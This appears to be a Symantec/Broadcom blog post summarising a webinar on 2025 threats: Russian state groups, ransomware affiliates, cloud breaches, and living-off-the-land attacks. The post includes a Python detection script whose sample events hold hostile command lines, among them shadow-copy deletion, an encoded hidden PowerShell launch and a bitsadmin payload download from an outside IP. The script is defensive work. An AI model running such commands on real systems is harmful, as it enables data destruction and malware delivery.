
Four Cybersecurity Challenges to Focus On Right Now

These threats and trends just may define your year

  • Principal Intelligence Analyst Dick O’Brien hosted a recent webinar to dissect the top potential challenges facing organizations in 2025.
  • Topping the list are nation-state actors, LotL attacks, faltering cloud security and more.
  • These findings were drawn from the latest intel from the Symantec & Carbon Black Threat Hunter Team.

In an era when tactics continually evolve, harnessing the latest threat intelligence is key. That’s exactly what our Principal Intelligence Analyst, Dick O’Brien, brought to the table in “Beyond the Horizon: Cybersecurity Challenges in 2025.” In this data-packed webinar, Dick revealed four cybersecurity challenges organizations can expect to encounter in 2025, backed by fresh intel straight from the Symantec & Carbon Black Threat Hunter Team.

Here are our four key observations to have on your radar right now—insights you don’t want to miss.

Increased Russian aggression in cyberspace

Russian nation-state cyberattacks pose a risk as conditions increasingly resemble those during their 2016 spike in activity—a period of political instability, divisive election campaigns and economic uncertainty, where public levels of suspicion and paranoia were already high. Today, recent incidents like the cutting of undersea cables in the Baltic Sea suggest that Russia may be escalating its tactics once again.

As the state of the world today echoes that of 2016, two prominent Russian groups exemplify the threat: Sandworm and Dragonfly. Sandworm—the notorious group responsible for blacking out Ukraine’s power grid in 2015, 2016 and 2022—has demonstrated a consistent capability to mount destructive attacks.

Uncovered by us about a decade ago, Dragonfly is capable of deep penetration of energy sector networks, using spear phishing, custom Trojans, and lateral movement across both administrative and industrial control system (ICS) networks.

Shifting ransomware dynamics

Since around 2020, the rise of ransomware-as-a-service (RaaS) has allowed attackers to scale their nefarious operations and multiply their revenue. RaaS operators now compete for affiliates, which means if law enforcement shuts down one group, affiliates can quickly join a new operator—minimizing downtime for advanced attacks.

Scattered Spider is a notable example of a “super affiliate,” responsible for recent high-profile attacks on Caesars Entertainment and MGM Resorts. As English speakers with a strong understanding of enterprise systems, their social engineering attacks on help desk staff were dangerously successful, earning them password changes and multi-factor authentication (MFA) bypass. Scattered Spider shifted between groups like Noberus, RansomHub and Qilin before a few members were arrested—but there are plenty of equally dangerous affiliates still out there.

Upsurge in Living-off-the-Land (LotL) attacks

The vast majority of tools ransomware attackers use to breach a network and move laterally are legitimate ones, often tools businesses need for their daily operations. Malware isn’t even needed in some cases, and hiding under the cover of a familiar tool means it takes longer before the alarms are raised. While this isn’t a new tactic, the rate of LotL attacks is increasing alarmingly.

Some of the more frequently used tools are those native to the OS or signed by a legitimate developer: PowerShell, PsExec, WMI, Schtasks, BITSAdmin and Vssadmin. But more and more tools are being added to the mix, with attackers adapting their techniques to evade rising defenses.
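Because these binaries are legitimate, the detection problem is context rather than presence. The following triage script is an added example, not code from the post or from Symantec: it scans constructed process-creation records for the tools named above and flags only the binary-plus-argument combinations (and the Office-parent case) that are rare in routine administration; the rule patterns are illustrative assumptions, not a vendor rule set.

```python
import re
from typing import Dict, List, Optional

# Binary -> argument patterns that are uncommon in routine administration.
# These heuristics are assumptions for illustration, not a vendor rule set;
# bare use of each binary is left unflagged because it is normally legitimate.
LOTL_RULES: Dict[str, List[str]] = {
    "powershell.exe": [r"-enc\w*\s+\S{20,}", r"-nop\b", r"downloadstring\("],
    "psexec.exe": [r"\\\\[\w.-]+"],            # execution against a remote host
    "wmic.exe": [r"/node:", r"process\s+call\s+create"],
    "schtasks.exe": [r"/create\b"],
    "bitsadmin.exe": [r"/transfer\b", r"/addfile\b"],
    "vssadmin.exe": [r"delete\s+shadows", r"resize\s+shadowstorage"],
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}

# Constructed process-creation records in "user|parent image|command line" form.
SAMPLE_EVENTS = [
    "CORP\\jdoe|explorer.exe|powershell.exe -Command Get-Date",
    "CORP\\svc_backup|backupagent.exe|vssadmin.exe list shadows",
    "NT AUTHORITY\\SYSTEM|services.exe|vssadmin.exe delete shadows /all /quiet",
    "CORP\\jdoe|winword.exe|powershell.exe -nop -w hidden -enc aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q=",
    "CORP\\admin|cmd.exe|psexec.exe \\\\fileserver01 -s cmd.exe",
    "CORP\\admin|cmd.exe|schtasks.exe /query /fo LIST",
    "CORP\\jdoe|cmd.exe|bitsadmin.exe /transfer job1 http://203.0.113.10/a.bin C:\\Users\\Public\\a.bin",
]

def parse_event(line: str) -> Dict[str, str]:
    """Split a record and reduce the executed image to its bare file name."""
    user, parent, cmdline = line.split("|", 2)
    image = cmdline.split(maxsplit=1)[0].lower().rsplit("\\", 1)[-1]
    return {"user": user, "parent": parent.lower(), "image": image, "cmdline": cmdline}

def triage(line: str) -> Optional[Dict[str, str]]:
    """Return a finding when an event matches a LotL rule, else None."""
    ev = parse_event(line)
    patterns = LOTL_RULES.get(ev["image"])
    if not patterns:
        return None
    hits = [p for p in patterns if re.search(p, ev["cmdline"], re.IGNORECASE)]
    if ev["parent"] in OFFICE_PARENTS:   # a document spawning these tools is itself unusual
        hits.append("office-parent")
    if not hits:
        return None
    return {"image": ev["image"], "user": ev["user"], "reasons": ", ".join(hits)}

def triage_all(lines: List[str]) -> List[Dict[str, str]]:
    """Triage every record and keep only the events that produced a finding."""
    return [f for f in (triage(line) for line in lines) if f]
```

Running `triage_all(SAMPLE_EVENTS)` flags four of the seven constructed records (shadow-copy deletion, an encoded PowerShell launch from Word, remote PsExec execution and a BITS download) while leaving the routine `Get-Date`, `vssadmin list shadows` and `schtasks /query` invocations alone.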

Attacks against the cloud

The honeymoon for cloud service security is coming to an end. It’s certainly a lot harder to breach a cloud service than an organization’s network, but the perception that they’re inherently secure is challenged by recent breaches—particularly by espionage-motivated attackers. One such actor serves as a picture of what organizations should look out for in the cloud. 

Fritillary (aka Midnight Blizzard or APT29) may use a lot of the same tools, tactics and procedures (TTPs) that their peers use, but they’re also innovative. The Russian nation-state group’s recent demonstration of their ability to breach Microsoft 365 accounts (including those of senior executives) shows just what they’re capable of—and what other groups who follow in their footsteps could do in this focal shift to cloud services. 

Get the full picture

For the entire deep dive into this analysis, and insight into what you need on your radar, watch the on-demand webinar.


About the Author

Enterprise Security Group by Broadcom

The Enterprise Security Group at Broadcom is the combined portfolio of Symantec and Carbon Black solutions for Endpoint, Network, Information, and Application Security—delivering legendary enterprise security solutions to protect any business.
